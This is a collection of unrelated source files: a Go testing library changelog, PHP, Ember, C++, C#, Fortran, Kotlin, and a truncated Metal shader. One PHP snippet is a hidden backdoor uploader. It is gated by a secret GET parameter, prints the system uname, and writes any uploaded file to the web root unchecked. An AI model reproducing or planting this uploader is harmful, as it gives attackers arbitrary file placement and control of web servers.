## 1.4.3
### Fixes:
- ensure file name and line numbers are correctly reported for XUnit [6fff58f]
- Fixed matcher for content-type (#305) [69d9b43]
## 1.4.2
### Fixes:
- Add go.mod and go.sum files to define the gomega go module [f3de367, a085d30]
- Work around go vet issue with Go v1.11 (#300) [40dd6ad]
- Better output when using with go XUnit-style tests, fixes #255 (#297) [29a4b97]
- Fix MatchJSON fail to parse json.RawMessage (#298) [ae19f1b]
- show threshold in failure message of BeNumericallyMatcher (#293) [4bbecc8]
## 1.4.1
### Fixes:
- Update documentation formatting and examples (#289) [9be8410]
- allow 'Receive' matcher to be used with concrete types (#286) [41673fd]
- Fix data race in ghttp server (#283) [7ac6b01]
- Travis badge should only show master [cc102ab]
## 1.4.0
### Features
- Make string pretty diff user configurable (#273) [eb112ce, 649b44d]
### Fixes
- Use httputil.DumpRequest to pretty-print unhandled requests (#278) [a4ff0fc, b7d1a52]
- fix typo floa32 > float32 (#272) [041ae3b, 6e33911]
- Fix link to documentation on adding your own matchers (#270) [bb2c830, fcebc62]
- Use setters and getters to avoid race condition (#262) [13057c3, a9c79f1]
- Avoid sending a signal if the process is not alive (#259) [b8043e5, 4fc1762]
- Improve message from AssignableToTypeOf when expected value is nil (#281) [9c1fb20]
## 1.3.0
Improvements:
- The `Equal` matcher matches byte slices more performantly.
- Improved how `MatchError` matches error strings.
- `MatchXML` ignores the order of xml node attributes.
- Improve support for XUnit style golang tests. ([#254](https://github.com/onsi/gomega/issues/254))
Bug Fixes:
- Diff generation now handles multi-byte sequences correctly.
- Multiple goroutines can now call `gexec.Build` concurrently.
## 1.2.0
Improvements:
- Added `BeSent` which attempts to send a value down a channel and fails if the attempt blocks. Can be paired with `Eventually` to safely send a value down a channel with a timeout.
- `Ω`, `Expect`, `Eventually`, and `Consistently` now immediately `panic` if there is no registered fail handler. This is always a mistake that can hide failing tests.
- `Receive()` no longer errors when passed a closed channel, it's perfectly fine to attempt to read from a closed channel so Ω(c).Should(Receive()) always fails and Ω(c).ShoudlNot(Receive()) always passes with a closed channel.
- Added `HavePrefix` and `HaveSuffix` matchers.
- `ghttp` can now handle concurrent requests.
- Added `Succeed` which allows one to write `Ω(MyFunction()).Should(Succeed())`.
- Improved `ghttp`'s behavior around failing assertions and panics:
- If a registered handler makes a failing assertion `ghttp` will return `500`.
- If a registered handler panics, `ghttp` will return `500` *and* fail the test. This is new behavior that may cause existing code to break. This code is almost certainly incorrect and creating a false positive.
- `ghttp` servers can take an `io.Writer`. `ghttp` will write a line to the writer when each request arrives.
- Added `WithTransform` matcher to allow munging input data before feeding into the relevant matcher
- Added boolean `And`, `Or`, and `Not` matchers to allow creating composite matchers
- Added `gbytes.TimeoutCloser`, `gbytes.TimeoutReader`, and `gbytes.TimeoutWriter` - these are convenience wrappers that timeout if the underlying Closer/Reader/Writer does not return within the alloted time.
- Added `gbytes.BufferReader` - this constructs a `gbytes.Buffer` that asynchronously reads the passed-in `io.Reader` into its buffer.
Bug Fixes:
- gexec: `session.Wait` now uses `EventuallyWithOffset` to get the right line number in the failure.
- `ContainElement` no longer bails if a passed-in matcher errors.
## 1.0 (8/2/2014)
No changes. Dropping "beta" from the version number.
## 1.0.0-beta (7/8/2014)
Breaking Changes:
- Changed OmegaMatcher interface. Instead of having `Match` return failure messages, two new methods `FailureMessage` and `NegatedFailureMessage` are called instead.
- Moved and renamed OmegaFailHandler to types.GomegaFailHandler and OmegaMatcher to types.GomegaMatcher. Any references to OmegaMatcher in any custom matchers will need to be changed to point to types.GomegaMatcher
New Test-Support Features:
- `ghttp`: supports testing http clients
- Provides a flexible fake http server
- Provides a collection of chainable http handlers that perform assertions.
- `gbytes`: supports making ordered assertions against streams of data
- Provides a `gbytes.Buffer`
- Provides a `Say` matcher to perform ordered assertions against output data
- `gexec`: supports testing external processes
- Provides support for building Go binaries
- Wraps and starts `exec.Cmd` commands
- Makes it easy to assert against stdout and stderr
- Makes it easy to send signals and wait for processes to exit
- Provides an `Exit` matcher to assert against exit code.
DSL Changes:
- `Eventually` and `Consistently` can accept `time.Duration` interval and polling inputs.
- The default timeouts for `Eventually` and `Consistently` are now configurable.
New Matchers:
- `ConsistOf`: order-independent assertion against the elements of an array/slice or keys of a map.
- `BeTemporally`: like `BeNumerically` but for `time.Time`
- `HaveKeyWithValue`: asserts a map has a given key with the given value.
Updated Matchers:
- `Receive` matcher can take a matcher as an argument and passes only if the channel under test receives an objet that satisfies the passed-in matcher.
- Matchers that implement `MatchMayChangeInTheFuture(actual interface{}) bool` can inform `Eventually` and/or `Consistently` when a match has no chance of changing status in the future. For example, `Receive` returns `false` when a channel is closed.
Misc:
- Start using semantic versioning
- Start maintaining changelog
Major refactor:
- Pull out Gomega's internal to `internal`
| {
"pile_set_name": "Github"
} |
<?php
/**
* Figlet CAPTCHA.
*
* PHP version 7
*
* Copyright (C) Villanova University 2020.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2,
* as published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
* @category VuFind
* @package CAPTCHA
* @author Mario Trojan <[email protected]>
* @license http://opensource.org/licenses/gpl-2.0.php GNU General Public License
* @link https://vufind.org Main Page
*/
namespace VuFind\Captcha;
/**
* Figlet CAPTCHA.
*
* @category VuFind
* @package CAPTCHA
* @author Mario Trojan <[email protected]>
* @license http://opensource.org/licenses/gpl-2.0.php GNU General Public License
* @link https://vufind.org/wiki/development Wiki
*/
class Figlet extends LaminasBase
{
}
| {
"pile_set_name": "Github"
} |
import { inject as service } from '@ember/service';
import Component from '@ember/component';
import Errors from 'ui/utils/errors';
import layout from './template';
import {
get, set, observer, computed, setProperties
} from '@ember/object';
import { on } from '@ember/object/evented';
export default Component.extend({
settings: service(),
access: service(),
intl: service(),
router: service(),
layout,
tagName: 'section',
classNames: ['well'],
model: null,
individuals: 'siteAccess.users',
collection: 'siteAccess.groups',
principals: null,
saved: true,
errors: null,
actions: {
addAuthorized(principal) {
if ( !principal ) {
return;
}
this.send('clearError');
set(this, 'saved', false);
if (this.checkDuplicate(principal)) {
this.send('gotError', get(this, 'intl').t('siteAccess.dupe'))
} else {
get(this, 'model.allowedPrincipalIds').pushObject(principal.id);
}
},
refreshAllTokens() {
set(this, 'refreshing', true);
this.globalStore.request({
url: '/v3/users?action=refreshauthprovideraccess',
method: 'POST',
data: {}
})
.catch((err) => {
set(this, 'errors', [err.message]);
})
.finally(() => {
set(this, 'refreshing', false);
});
},
removeAuthorized(id) {
set(this, 'saved', false);
get(this, 'model.allowedPrincipalIds').removeObject(id);
},
save(btnCb) {
this.send('clearError');
if ( get(this, 'model.accessMode') !== 'unrestricted' && !get(this, 'model.allowedPrincipalIds.length') ) {
this.send('gotError', get(this, 'intl').t('siteAccess.minimum'));
btnCb();
return;
}
set(this, 'saved', false);
const model = get(this, 'model');
model.save().then(() => {
set(this, 'saved', true);
}).catch((err) => {
this.send('gotError', err);
}).finally(() => {
btnCb();
});
},
cancel() {
if (this.cancel) {
this.cancel();
} else {
this.router.transitionTo('global-admin.security.authentication');
}
},
gotError(err) {
set(this, 'errors', [Errors.stringify(err)]);
},
clearError() {
set(this, 'errors', null);
setProperties(this, { errors: null, });
},
},
showList: computed('model.accessMode', function() {
return get(this, 'model.accessMode') !== 'unrestricted';
}),
accessModeChanged: on('init', observer('model.accessMode', function() {
set(this, 'saved', false);
const allowedPrincipals = get(this, 'model.allowedPrincipalIds') || []; // ['princ_id1://yada']
if ( get(this, 'model.accessMode') !== 'unrestricted' ) {
let found = false;
const myPIds = get(this, 'access.me.principalIds');
myPIds.forEach( (id) => {
if (allowedPrincipals.indexOf(id) >= 0) {
found = true;
}
});
if ( !found && !allowedPrincipals.length) {
allowedPrincipals.pushObject(get(this, 'access.principal.id'));
}
}
set(this, 'model.allowedPrincipalIds', allowedPrincipals);
})),
checkDuplicate(principal) {
return (get(this, 'model.allowedPrincipalIds') || []).includes(principal.id) ? true : false;
},
});
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2017-2020 Baidu Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#ifndef _OPENRASP_UTILS_NET_H_
#define _OPENRASP_UTILS_NET_H_
#include <string>
#include <vector>
#include <map>
namespace openrasp
{
void fetch_if_addrs(std::map<std::string, std::string> &if_addr_map);
void fetch_hw_addrs(std::vector<std::string> &hw_addrs);
bool fetch_source_in_ip_packets(char *local_ip, size_t len, char *url);
std::vector<std::string> lookup_host(const std::string &host);
} // namespace openrasp
#endif
| {
"pile_set_name": "Github"
} |
//----------------------------------------------
// NGUI: Next-Gen UI kit
// Copyright © 2011-2014 Tasharen Entertainment
//----------------------------------------------
using UnityEngine;
using System.Collections.Generic;
/// <summary>
/// Glyph structure used by BMFont. For more information see http://www.angelcode.com/products/bmfont/
/// </summary>
[System.Serializable]
public class BMGlyph
{
public int index; // Index of this glyph (used by BMFont)
public int x; // Offset from the left side of the texture to the left side of the glyph
public int y; // Offset from the top of the texture to the top of the glyph
public int width; // Glyph's width in pixels
public int height; // Glyph's height in pixels
public int offsetX; // Offset to apply to the cursor's left position before drawing this glyph
public int offsetY; // Offset to apply to the cursor's top position before drawing this glyph
public int advance; // How much to move the cursor after printing this character
public int channel; // Channel mask (in most cases this will be 15 (RGBA, 1+2+4+8)
public List<int> kerning;
/// <summary>
/// Retrieves the special amount by which to adjust the cursor position, given the specified previous character.
/// </summary>
public int GetKerning (int previousChar)
{
if (kerning != null && previousChar != 0)
{
for (int i = 0, imax = kerning.Count; i < imax; i += 2)
if (kerning[i] == previousChar)
return kerning[i+1];
}
return 0;
}
/// <summary>
/// Add a new kerning entry to the character (or adjust an existing one).
/// </summary>
public void SetKerning (int previousChar, int amount)
{
if (kerning == null) kerning = new List<int>();
for (int i = 0; i < kerning.Count; i += 2)
{
if (kerning[i] == previousChar)
{
kerning[i+1] = amount;
return;
}
}
kerning.Add(previousChar);
kerning.Add(amount);
}
/// <summary>
/// Trim the glyph, given the specified minimum and maximum dimensions in pixels.
/// </summary>
public void Trim (int xMin, int yMin, int xMax, int yMax)
{
int x1 = x + width;
int y1 = y + height;
if (x < xMin)
{
int offset = xMin - x;
x += offset;
width -= offset;
offsetX += offset;
}
if (y < yMin)
{
int offset = yMin - y;
y += offset;
height -= offset;
offsetY += offset;
}
if (x1 > xMax) width -= x1 - xMax;
if (y1 > yMax) height -= y1 - yMax;
}
}
| {
"pile_set_name": "Github"
} |
<?php
error_reporting(0);
set_time_limit(0);
if($_GET['Izanami']=="Xploit"){
echo "<center><b>Uname:".php_uname()."<br></b>";
echo '<font color="black" size="4">';
if(isset($_POST['Submit'])){
$filedir = "";
$maxfile = '2000000';
$mode = '0644';
$userfile_name = $_FILES['image']['name'];
$userfile_tmp = $_FILES['image']['tmp_name'];
if(isset($_FILES['image']['name'])) {
$qx = $filedir.$userfile_name;
@move_uploaded_file($userfile_tmp, $qx);
@chmod ($qx, octdec($mode));
echo" <a href=$userfile_name><center><b>Sucess Upload :D ==> $userfile_name</b></center></a>";
}
}
else{
echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
}
echo '</center></font>';
}
?> | {
"pile_set_name": "Github"
} |
*> \brief \b CHESWAPR applies an elementary permutation on the rows and columns of a Hermitian matrix.
*
* =========== DOCUMENTATION ===========
*
* Online html documentation available at
* http://www.netlib.org/lapack/explore-html/
*
*> \htmlonly
*> Download CHESWAPR + dependencies
*> <a href="http://www.netlib.org/cgi-bin/netlibfiles.tgz?format=tgz&filename=/lapack/lapack_routine/cheswapr.f">
*> [TGZ]</a>
*> <a href="http://www.netlib.org/cgi-bin/netlibfiles.zip?format=zip&filename=/lapack/lapack_routine/cheswapr.f">
*> [ZIP]</a>
*> <a href="http://www.netlib.org/cgi-bin/netlibfiles.txt?format=txt&filename=/lapack/lapack_routine/cheswapr.f">
*> [TXT]</a>
*> \endhtmlonly
*
* Definition:
* ===========
*
* SUBROUTINE CHESWAPR( UPLO, N, A, LDA, I1, I2)
*
* .. Scalar Arguments ..
* CHARACTER UPLO
* INTEGER I1, I2, LDA, N
* ..
* .. Array Arguments ..
* COMPLEX A( LDA, N )
*
*
*> \par Purpose:
* =============
*>
*> \verbatim
*>
*> CHESWAPR applies an elementary permutation on the rows and the columns of
*> a hermitian matrix.
*> \endverbatim
*
* Arguments:
* ==========
*
*> \param[in] UPLO
*> \verbatim
*> UPLO is CHARACTER*1
*> Specifies whether the details of the factorization are stored
*> as an upper or lower triangular matrix.
*> = 'U': Upper triangular, form is A = U*D*U**T;
*> = 'L': Lower triangular, form is A = L*D*L**T.
*> \endverbatim
*>
*> \param[in] N
*> \verbatim
*> N is INTEGER
*> The order of the matrix A. N >= 0.
*> \endverbatim
*>
*> \param[in,out] A
*> \verbatim
*> A is COMPLEX array, dimension (LDA,N)
*> On entry, the NB diagonal matrix D and the multipliers
*> used to obtain the factor U or L as computed by CSYTRF.
*>
*> On exit, if INFO = 0, the (symmetric) inverse of the original
*> matrix. If UPLO = 'U', the upper triangular part of the
*> inverse is formed and the part of A below the diagonal is not
*> referenced; if UPLO = 'L' the lower triangular part of the
*> inverse is formed and the part of A above the diagonal is
*> not referenced.
*> \endverbatim
*>
*> \param[in] LDA
*> \verbatim
*> LDA is INTEGER
*> The leading dimension of the array A. LDA >= max(1,N).
*> \endverbatim
*>
*> \param[in] I1
*> \verbatim
*> I1 is INTEGER
*> Index of the first row to swap
*> \endverbatim
*>
*> \param[in] I2
*> \verbatim
*> I2 is INTEGER
*> Index of the second row to swap
*> \endverbatim
*
* Authors:
* ========
*
*> \author Univ. of Tennessee
*> \author Univ. of California Berkeley
*> \author Univ. of Colorado Denver
*> \author NAG Ltd.
*
*> \date December 2016
*
*> \ingroup complexHEauxiliary
*
* =====================================================================
SUBROUTINE CHESWAPR( UPLO, N, A, LDA, I1, I2)
*
* -- LAPACK auxiliary routine (version 3.7.0) --
* -- LAPACK is a software package provided by Univ. of Tennessee, --
* -- Univ. of California Berkeley, Univ. of Colorado Denver and NAG Ltd..--
* December 2016
*
* .. Scalar Arguments ..
CHARACTER UPLO
INTEGER I1, I2, LDA, N
* ..
* .. Array Arguments ..
COMPLEX A( LDA, N )
*
* =====================================================================
*
* ..
* .. Local Scalars ..
LOGICAL UPPER
INTEGER I
COMPLEX TMP
*
* .. External Functions ..
LOGICAL LSAME
EXTERNAL LSAME
* ..
* .. External Subroutines ..
EXTERNAL CSWAP
* ..
* .. Executable Statements ..
*
UPPER = LSAME( UPLO, 'U' )
IF (UPPER) THEN
*
* UPPER
* first swap
* - swap column I1 and I2 from I1 to I1-1
CALL CSWAP( I1-1, A(1,I1), 1, A(1,I2), 1 )
*
* second swap :
* - swap A(I1,I1) and A(I2,I2)
* - swap row I1 from I1+1 to I2-1 with col I2 from I1+1 to I2-1
* - swap A(I2,I1) and A(I1,I2)
TMP=A(I1,I1)
A(I1,I1)=A(I2,I2)
A(I2,I2)=TMP
*
DO I=1,I2-I1-1
TMP=A(I1,I1+I)
A(I1,I1+I)=CONJG(A(I1+I,I2))
A(I1+I,I2)=CONJG(TMP)
END DO
*
A(I1,I2)=CONJG(A(I1,I2))
*
* third swap
* - swap row I1 and I2 from I2+1 to N
DO I=I2+1,N
TMP=A(I1,I)
A(I1,I)=A(I2,I)
A(I2,I)=TMP
END DO
*
ELSE
*
* LOWER
* first swap
* - swap row I1 and I2 from 1 to I1-1
CALL CSWAP ( I1-1, A(I1,1), LDA, A(I2,1), LDA )
*
* second swap :
* - swap A(I1,I1) and A(I2,I2)
* - swap col I1 from I1+1 to I2-1 with row I2 from I1+1 to I2-1
* - swap A(I2,I1) and A(I1,I2)
TMP=A(I1,I1)
A(I1,I1)=A(I2,I2)
A(I2,I2)=TMP
*
DO I=1,I2-I1-1
TMP=A(I1+I,I1)
A(I1+I,I1)=CONJG(A(I2,I1+I))
A(I2,I1+I)=CONJG(TMP)
END DO
*
A(I2,I1)=CONJG(A(I2,I1))
*
* third swap
* - swap col I1 and I2 from I2+1 to N
DO I=I2+1,N
TMP=A(I,I1)
A(I,I1)=A(I,I2)
A(I,I2)=TMP
END DO
*
ENDIF
END SUBROUTINE CHESWAPR
| {
"pile_set_name": "Github"
} |
package org.elixir_lang.beam.chunk.debug_info.v1.erl_abstract_code.abstract_code_compiler_options.abstract_code
import com.ericsson.otp.erlang.OtpErlangObject
import com.ericsson.otp.erlang.OtpErlangTuple
import org.elixir_lang.beam.chunk.debug_info.v1.erl_abstract_code.abstract_code_compiler_options.AbstractCode.ifTag
object Tuple {
fun ifToMacroStringDeclaredScope(term: OtpErlangObject, scope: Scope): MacroStringDeclaredScope? =
ifTag(term, TAG) { toMacroStringDeclaredScope(it, scope) }
fun toMacroStringDeclaredScope(term: OtpErlangTuple, scope: Scope): MacroStringDeclaredScope =
elementsMacroStringDeclaredScope(term, scope).let { (elementsMacroString, elementsDeclaredScope) ->
MacroStringDeclaredScope("{$elementsMacroString}", elementsDeclaredScope)
}
private const val TAG = "tuple"
private fun elementsMacroStringDeclaredScope(term: OtpErlangTuple, scope: Scope) =
toElements(term)
?.let { Elements.toMacroStringDeclaredScope(it, scope) }
?: MacroStringDeclaredScope("missing_elements", Scope.EMPTY)
private fun toElements(term: OtpErlangTuple): OtpErlangObject? = term.elementAt(2)
}
| {
"pile_set_name": "Github"
} |
#pragma clang diagnostic ignored "-Wmissing-prototypes"
#pragma clang diagnostic ignored "-Wmissing-braces"
#include <metal_stdlib>
#include <simd/simd.h>
using namespace metal;
template<typename T, size_t Num>
struct spvUnsafeArray
{
T elements[Num ? Num : 1];
thread T& operator [] (size_t pos) thread
{
return elements[pos];
}
constexpr const thread T& operator [] (size_t pos) const thread
{
return elements[pos];
}
device T& operator [] (size_t pos) device
{
return elements[pos];
}
constexpr const device T& operator [] (size_t pos) const device
{
return elements[pos];
}
constexpr const constant T& operator [] (size_t pos) const constant
{
return elements[pos];
}
threadgroup T& operator [] (size_t pos) threadgroup
{
return elements[pos];
}
constexpr const threadgroup T& operator [] (size_t pos) const threadgroup
{
return elements[pos];
}
};
struct type_View
{
float4x4 View_TranslatedWorldToClip;
float4x4 View_WorldToClip;
float4x4 View_ClipToWorld;
float4x4 View_TranslatedWorldToView;
float4x4 View_ViewToTranslatedWorld;
float4x4 View_TranslatedWorldToCameraView;
float4x4 View_CameraViewToTranslatedWorld;
float4x4 View_ViewToClip;
float4x4 View_ViewToClipNoAA;
float4x4 View_ClipToView;
float4x4 View_ClipToTranslatedWorld;
float4x4 View_SVPositionToTranslatedWorld;
float4x4 View_ScreenToWorld;
float4x4 View_ScreenToTranslatedWorld;
packed_float3 View_ViewForward;
float PrePadding_View_908;
packed_float3 View_ViewUp;
float PrePadding_View_924;
packed_float3 View_ViewRight;
float PrePadding_View_940;
packed_float3 View_HMDViewNoRollUp;
float PrePadding_View_956;
packed_float3 View_HMDViewNoRollRight;
float PrePadding_View_972;
float4 View_InvDeviceZToWorldZTransform;
float4 View_ScreenPositionScaleBias;
packed_float3 View_WorldCameraOrigin;
float PrePadding_View_1020;
packed_float3 View_TranslatedWorldCameraOrigin;
float PrePadding_View_1036;
packed_float3 View_WorldViewOrigin;
float PrePadding_View_1052;
packed_float3 View_PreViewTranslation;
float PrePadding_View_1068;
float4x4 View_PrevProjection;
float4x4 View_PrevViewProj;
float4x4 View_PrevViewRotationProj;
float4x4 View_PrevViewToClip;
float4x4 View_PrevClipToView;
float4x4 View_PrevTranslatedWorldToClip;
float4x4 View_PrevTranslatedWorldToView;
float4x4 View_PrevViewToTranslatedWorld;
float4x4 View_PrevTranslatedWorldToCameraView;
float4x4 View_PrevCameraViewToTranslatedWorld;
packed_float3 View_PrevWorldCameraOrigin;
float PrePadding_View_1724;
packed_float3 View_PrevWorldViewOrigin;
float PrePadding_View_1740;
packed_float3 View_PrevPreViewTranslation;
float PrePadding_View_1756;
float4x4 View_PrevInvViewProj;
float4x4 View_PrevScreenToTranslatedWorld;
float4x4 View_ClipToPrevClip;
float4 View_TemporalAAJitter;
float4 View_GlobalClippingPlane;
float2 View_FieldOfViewWideAngles;
float2 View_PrevFieldOfViewWideAngles;
float4 View_ViewRectMin;
float4 View_ViewSizeAndInvSize;
float4 View_BufferSizeAndInvSize;
float4 View_BufferBilinearUVMinMax;
int View_NumSceneColorMSAASamples;
float View_PreExposure;
float View_OneOverPreExposure;
float PrePadding_View_2076;
float4 View_DiffuseOverrideParameter;
float4 View_SpecularOverrideParameter;
float4 View_NormalOverrideParameter;
float2 View_RoughnessOverrideParameter;
float View_PrevFrameGameTime;
float View_PrevFrameRealTime;
float View_OutOfBoundsMask;
float PrePadding_View_2148;
float PrePadding_View_2152;
float PrePadding_View_2156;
packed_float3 View_WorldCameraMovementSinceLastFrame;
float View_CullingSign;
float View_NearPlane;
float View_AdaptiveTessellationFactor;
float View_GameTime;
float View_RealTime;
float View_DeltaTime;
float View_MaterialTextureMipBias;
float View_MaterialTextureDerivativeMultiply;
uint View_Random;
uint View_FrameNumber;
uint View_StateFrameIndexMod8;
uint View_StateFrameIndex;
float View_CameraCut;
float View_UnlitViewmodeMask;
float PrePadding_View_2228;
float PrePadding_View_2232;
float PrePadding_View_2236;
float4 View_DirectionalLightColor;
packed_float3 View_DirectionalLightDirection;
float PrePadding_View_2268;
float4 View_TranslucencyLightingVolumeMin[2];
float4 View_TranslucencyLightingVolumeInvSize[2];
float4 View_TemporalAAParams;
float4 View_CircleDOFParams;
float View_DepthOfFieldSensorWidth;
float View_DepthOfFieldFocalDistance;
float View_DepthOfFieldScale;
float View_DepthOfFieldFocalLength;
float View_DepthOfFieldFocalRegion;
float View_DepthOfFieldNearTransitionRegion;
float View_DepthOfFieldFarTransitionRegion;
float View_MotionBlurNormalizedToPixel;
float View_bSubsurfacePostprocessEnabled;
float View_GeneralPurposeTweak;
float View_DemosaicVposOffset;
float PrePadding_View_2412;
packed_float3 View_IndirectLightingColorScale;
float View_HDR32bppEncodingMode;
packed_float3 View_AtmosphericFogSunDirection;
float View_AtmosphericFogSunPower;
float View_AtmosphericFogPower;
float View_AtmosphericFogDensityScale;
float View_AtmosphericFogDensityOffset;
float View_AtmosphericFogGroundOffset;
float View_AtmosphericFogDistanceScale;
float View_AtmosphericFogAltitudeScale;
float View_AtmosphericFogHeightScaleRayleigh;
float View_AtmosphericFogStartDistance;
float View_AtmosphericFogDistanceOffset;
float View_AtmosphericFogSunDiscScale;
float View_AtmosphericFogSunDiscHalfApexAngleRadian;
float PrePadding_View_2492;
float4 View_AtmosphericFogSunDiscLuminance;
uint View_AtmosphericFogRenderMask;
uint View_AtmosphericFogInscatterAltitudeSampleNum;
uint PrePadding_View_2520;
uint PrePadding_View_2524;
float4 View_AtmosphericFogSunColor;
packed_float3 View_NormalCurvatureToRoughnessScaleBias;
float View_RenderingReflectionCaptureMask;
float4 View_AmbientCubemapTint;
float View_AmbientCubemapIntensity;
float View_SkyLightParameters;
float PrePadding_View_2584;
float PrePadding_View_2588;
float4 View_SkyLightColor;
float4 View_SkyIrradianceEnvironmentMap[7];
float View_MobilePreviewMode;
float View_HMDEyePaddingOffset;
float View_ReflectionCubemapMaxMip;
float View_ShowDecalsMask;
uint View_DistanceFieldAOSpecularOcclusionMode;
float View_IndirectCapsuleSelfShadowingIntensity;
float PrePadding_View_2744;
float PrePadding_View_2748;
packed_float3 View_ReflectionEnvironmentRoughnessMixingScaleBiasAndLargestWeight;
int View_StereoPassIndex;
float4 View_GlobalVolumeCenterAndExtent[4];
float4 View_GlobalVolumeWorldToUVAddAndMul[4];
float View_GlobalVolumeDimension;
float View_GlobalVolumeTexelSize;
float View_MaxGlobalDistance;
float PrePadding_View_2908;
int2 View_CursorPosition;
float View_bCheckerboardSubsurfaceProfileRendering;
float PrePadding_View_2924;
packed_float3 View_VolumetricFogInvGridSize;
float PrePadding_View_2940;
packed_float3 View_VolumetricFogGridZParams;
float PrePadding_View_2956;
float2 View_VolumetricFogSVPosToVolumeUV;
float View_VolumetricFogMaxDistance;
float PrePadding_View_2972;
packed_float3 View_VolumetricLightmapWorldToUVScale;
float PrePadding_View_2988;
packed_float3 View_VolumetricLightmapWorldToUVAdd;
float PrePadding_View_3004;
packed_float3 View_VolumetricLightmapIndirectionTextureSize;
float View_VolumetricLightmapBrickSize;
packed_float3 View_VolumetricLightmapBrickTexelSize;
float View_StereoIPD;
float View_IndirectLightingCacheShowFlag;
float View_EyeToPixelSpreadAngle;
float PrePadding_View_3048;
float PrePadding_View_3052;
float4x4 View_WorldToVirtualTexture;
float4 View_VirtualTextureParams;
float4 View_XRPassthroughCameraUVs[2];
};
struct type_Material
{
float4 Material_VectorExpressions[5];
float4 Material_ScalarExpressions[2];
};
constant float4 _118 = {};
struct main0_out
{
float4 out_var_TEXCOORD6 [[user(locn0)]];
float4 out_var_TEXCOORD7 [[user(locn1)]];
float4 out_var_TEXCOORD10_centroid [[user(locn2)]];
float4 out_var_TEXCOORD11_centroid [[user(locn3)]];
float gl_ClipDistance [[clip_distance]] [1];
float4 gl_Position [[position]];
};
struct main0_in
{
float4 in_var_PN_DominantEdge2 [[attribute(3)]];
float4 in_var_PN_DominantEdge3 [[attribute(4)]];
float3 in_var_PN_DominantEdge4 [[attribute(5)]];
float3 in_var_PN_DominantEdge5 [[attribute(6)]];
float4 in_var_PN_DominantVertex1 [[attribute(8)]];
float3 in_var_PN_DominantVertex2 [[attribute(9)]];
float4 in_var_PN_POSITION_0 [[attribute(10)]];
float4 in_var_PN_POSITION_1 [[attribute(11)]];
float4 in_var_PN_POSITION_2 [[attribute(12)]];
float in_var_PN_WorldDisplacementMultiplier [[attribute(15)]];
float4 in_var_TEXCOORD10_centroid [[attribute(16)]];
float4 in_var_TEXCOORD11_centroid [[attribute(17)]];
float4 in_var_TEXCOORD6 [[attribute(18)]];
float4 in_var_TEXCOORD8 [[attribute(19)]];
};
struct main0_patchIn
{
float4 in_var_PN_POSITION9 [[attribute(13)]];
patch_control_point<main0_in> gl_in;
};
[[ patch(triangle, 0) ]] vertex main0_out main0(main0_patchIn patchIn [[stage_in]], constant type_View& View [[buffer(0)]], constant type_Material& Material [[buffer(1)]], texture3d<float> View_GlobalDistanceFieldTexture0 [[texture(0)]], texture3d<float> View_GlobalDistanceFieldTexture1 [[texture(1)]], texture3d<float> View_GlobalDistanceFieldTexture2 [[texture(2)]], texture3d<float> View_GlobalDistanceFieldTexture3 [[texture(3)]], sampler View_GlobalDistanceFieldSampler0 [[sampler(0)]], float3 gl_TessCoord [[position_in_patch]])
{
main0_out out = {};
spvUnsafeArray<float4, 3> _120 = spvUnsafeArray<float4, 3>({ patchIn.gl_in[0].in_var_TEXCOORD6, patchIn.gl_in[1].in_var_TEXCOORD6, patchIn.gl_in[2].in_var_TEXCOORD6 });
spvUnsafeArray<float4, 3> _121 = spvUnsafeArray<float4, 3>({ patchIn.gl_in[0].in_var_TEXCOORD8, patchIn.gl_in[1].in_var_TEXCOORD8, patchIn.gl_in[2].in_var_TEXCOORD8 });
spvUnsafeArray<float4, 3> _128 = spvUnsafeArray<float4, 3>({ patchIn.gl_in[0].in_var_TEXCOORD10_centroid, patchIn.gl_in[1].in_var_TEXCOORD10_centroid, patchIn.gl_in[2].in_var_TEXCOORD10_centroid });
spvUnsafeArray<float4, 3> _129 = spvUnsafeArray<float4, 3>({ patchIn.gl_in[0].in_var_TEXCOORD11_centroid, patchIn.gl_in[1].in_var_TEXCOORD11_centroid, patchIn.gl_in[2].in_var_TEXCOORD11_centroid });
spvUnsafeArray<spvUnsafeArray<float4, 3>, 3> _136 = spvUnsafeArray<spvUnsafeArray<float4, 3>, 3>({ spvUnsafeArray<float4, 3>({ patchIn.gl_in[0].in_var_PN_POSITION_0, patchIn.gl_in[0].in_var_PN_POSITION_1, patchIn.gl_in[0].in_var_PN_POSITION_2 }), spvUnsafeArray<float4, 3>({ patchIn.gl_in[1].in_var_PN_POSITION_0, patchIn.gl_in[1].in_var_PN_POSITION_1, patchIn.gl_in[1].in_var_PN_POSITION_2 }), spvUnsafeArray<float4, 3>({ patchIn.gl_in[2].in_var_PN_POSITION_0, patchIn.gl_in[2].in_var_PN_POSITION_1, patchIn.gl_in[2].in_var_PN_POSITION_2 }) });
spvUnsafeArray<float, 3> _137 = spvUnsafeArray<float, 3>({ patchIn.gl_in[0].in_var_PN_WorldDisplacementMultiplier, patchIn.gl_in[1].in_var_PN_WorldDisplacementMultiplier, patchIn.gl_in[2].in_var_PN_WorldDisplacementMultiplier });
spvUnsafeArray<float4, 3> _138 = spvUnsafeArray<float4, 3>({ patchIn.gl_in[0].in_var_PN_DominantVertex1, patchIn.gl_in[1].in_var_PN_DominantVertex1, patchIn.gl_in[2].in_var_PN_DominantVertex1 });
spvUnsafeArray<float3, 3> _139 = spvUnsafeArray<float3, 3>({ patchIn.gl_in[0].in_var_PN_DominantVertex2, patchIn.gl_in[1].in_var_PN_DominantVertex2, patchIn.gl_in[2].in_var_PN_DominantVertex2 });
